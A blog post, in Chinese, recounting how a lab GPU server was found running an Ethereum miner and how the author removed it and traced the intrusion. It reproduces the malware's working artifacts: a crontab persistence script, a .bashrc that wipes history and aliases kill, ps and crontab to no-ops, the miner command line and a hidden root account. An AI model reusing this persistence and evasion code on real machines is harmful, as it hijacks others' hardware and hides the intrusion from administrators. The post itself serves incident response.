记一次清除服务器挖矿病毒的经历

发表于 2021-03-14 分类于技术，运维 Waline：阅读次数：本文字数： 5.2k 阅读时长 ≈ 13 分钟

　　早上来到实验室，发现跑的程序又挂了，刚想吐槽学校怎么三天两头检修强电，却发现事情并没有这么简单。电脑挂着的nvidia-smi命令并没有断开连接，发现4块2080 TI都在满功耗的运行着，但是底下消耗显存的并不是自己的Python程序，ethminer的名字映入眼帘。

杀掉挖矿进程

1 2	~ >> sudo ps -aux /var/tmp/.ICMP-Unix/.bombarusa/./ethminer -P stratum1+tcp://0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.x22080x4:[email protected]@eth-asia1.nanopool.org:9999

　　使用ps命令查看进程，一眼就看到了挖矿程序，kill之，但是不出意外马上再次出现。

1
2
3

~ >> sudo ps -aux
/bin/bash /var/tmp/.ICMP-Unix/.bombarusa/run
/var/tmp/.ICMP-Unix/.bombarusa/./ethminer -P stratum1+tcp://0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.x22080x4:[email protected]@eth-asia1.nanopool.org:9999

　　再次使用ps命令，一行一行仔细观察，果不其然有守护程序，将两个一起kill掉，但是仍旧会再次启动。

挖矿守护程序

~ » cat /var/tmp/.ICMP-Unix/.bombarusa/run
#!/bin/bash
#made by LupuSclipici
if [ $# != 1 ]; then
        echo " usage: $0 > /dev/null 2>&1 & disown"
fi

locatie=$(cat /var/tmp/.log/.local)
if [ -f /var/tmp/.log/.local ]; then
  :
else
  if [ -d /var/tmp/.log ]; then
    echo $(pwd) > /var/tmp/.log/.local
  else
    mkdir /var/tmp/.log
    echo $(pwd) > /var/tmp/.log/.local
  fi
fi

crontabcalumea() {
  if ! crontab -l | grep -q 'run'; then
    rm -rf $(cat /var/tmp/.log/.local)/.tempo
    echo "@daily $(cat /var/tmp/.log/.local)/1" >> $(cat /var/tmp/.log/.local)/.tempo
    sleep 1
    echo "@reboot $(cat /var/tmp/.log/.local)/run > /dev/null 2>&1 & disown" >> $(cat /var/tmp/.log/.local)/.tempo
    sleep 1
    echo "@monthly $(cat /var/tmp/.log/.local)/run  > /dev/null 2>&1 & disown" >> $(cat /var/tmp/.log/.local)/.tempo
    sleep 1
    crontab $(cat /var/tmp/.log/.local)/.tempo
    sleep 1
    rm -rf $(cat /var/tmp/.log/.local)/.tempo
  fi
}


sleep 5
while :
do
$(cat /var/tmp/.log/.local)/1
crontabcalumea
sleep 5

　　直接查看挖矿守护程序，并没有混淆加密，在crontab计划任务中做了手脚。

sudo crontab -l
@daily /var/tmp/.ICMP-Unix/.bombarusa/1
@reboot /var/tmp/.ICMP-Unix/.bombarusa/run > /dev/null 2>&1 & disown
@monthly /var/tmp/.ICMP-Unix/.bombarusa/run  > /dev/null 2>&1 & disown

　　直接使用crontab -r删除无效，会重新被添加，于是将三者同时干掉。

1	sudo crontab -r && sudo kill -9 1234 1235

　　重新输入ps命令，可以观察到系统恢复正常，重新启动后挖矿程序也没有被唤醒。

清除挖矿病毒

　　切换到root用户后，发现了奇怪的提示，且各种命令都没有任何输出。

~ >> sudo su root
bash: alias: -i: 未找到
bash: alias: -i: 未找到
bash: alias: -i: 未找到
Uname: Linux shao 4.15.0-136-generic

ls -al
-rw-r--r--  1 root root   48 3月  14 05:33 .bash_profile
-rw-r--r--  1 root root  539 3月  14 05:33 .bashrc

　　果不其然bashrc被动了手脚。

bashrc

cat .bashrc
source /usr/.SQL-Unix/.SQL/.db

cat /usr/.SQL-Unix/.SQL/.db
# .bashrc
############
rm -rf ~/.bashrc
rm -rf ~/.bash_history
alias pkill='printf ""'
alias kill='printf ""'
alias killall='printf ""'
alias init='printf ""'
alias rm='printf ""'
alias halt='printf ""'
alias adduser='printf ""'
alias userdel='printf ""'
alias htop='printf ""'
alias find='printf ""'
alias nano='printf ""'
alias locate='printf ""'
alias crontab='printf ""'
alias ps='printf ""'
alias ss='printf ""'
alias netstat='printf ""'

　　看一眼有没有可疑的用户。

~ >> cat /etc/passwd
.syslogs:x:0:0::/home/.syslogs:/bin/bash

~ >> userdel .syslogs
userdel: user .syslogs is currently used by process 1

　　居然删不掉，直接用vim命令把/etc/passwd和/etc/shadow下的可疑用户删掉。

　　各用户下的~/.ssh/authorized_keys文件均正常，没有被修改。

　　至此，暂时认为病毒均已清除干净。

病毒溯源与复盘

　　基于各文件的创建时间来看，入侵时间发生在05:26左右，于是追查日志。

~ >> cat /var/log/auth.log
Mar 14 05:22:27 shao sshd[16508]: Accepted password for docker from 10.12.41.113 port 56762 ssh2
Mar 14 05:22:27 shao sshd[16508]: pam_unix(sshd:session): session opened for user docker by (uid=0)
Mar 14 05:22:27 shao systemd-logind[1229]: New session 154 of user docker.
Mar 14 05:22:27 shao systemd: pam_unix(systemd-user:session): session opened for user docker by (uid=0)
Mar 14 05:22:45 shao sudo:   docker : TTY=pts/11 ; PWD=/home/docker ; USER=root ; COMMAND=/bin/su
Mar 14 05:22:45 shao sudo: pam_unix(sudo:session): session opened for user root by docker(uid=0)
Mar 14 05:22:45 shao su[16907]: Successful su for root by root
Mar 14 05:22:45 shao su[16907]: + /dev/pts/11 root:root
Mar 14 05:22:45 shao su[16907]: pam_unix(su:session): session opened for user root by docker(uid=0)
Mar 14 05:22:45 shao su[16907]: pam_systemd(su:session): Cannot create session: Already running in a session
Mar 14 05:33:23 shao useradd[24859]: new user: name=.syslogs, UID=0, GID=0, home=/home/.syslogs, shell=/bin/bash
Mar 14 05:33:23 shao usermod[24865]: add '.syslogs' to group 'sudo'
Mar 14 05:33:23 shao usermod[24865]: add '.syslogs' to shadow group 'sudo'
Mar 14 05:33:23 shao passwd[24871]: pam_unix(passwd:chauthtok): password changed for .syslogs
Mar 14 05:33:23 shao passwd[24871]: gkr-pam: couldn't update the login keyring password: no old password was entered
Mar 14 05:33:44 shao su[16907]: pam_unix(su:session): session closed for user root
Mar 14 05:33:44 shao sudo: pam_unix(sudo:session): session closed for user root
Mar 14 05:33:47 shao sshd[16696]: Received disconnect from 10.12.41.113 port 56762:11: disconnected by user
Mar 14 05:33:47 shao sshd[16696]: Disconnected from user docker 10.12.41.113 port 56762
Mar 14 05:33:47 shao sshd[16508]: pam_unix(sshd:session): session closed for user docker

　　可以看到是docker有漏洞导致被攻陷。

~ » sudo cat /home/docker/.bash_history
nvidia-smi
pkill python
ls
sud osu
1
sudo su
exit

　　通过命令日志，可以看到是人为的，并不是自动化的攻击脚本。

　　待查证10.12.41.133的所属者。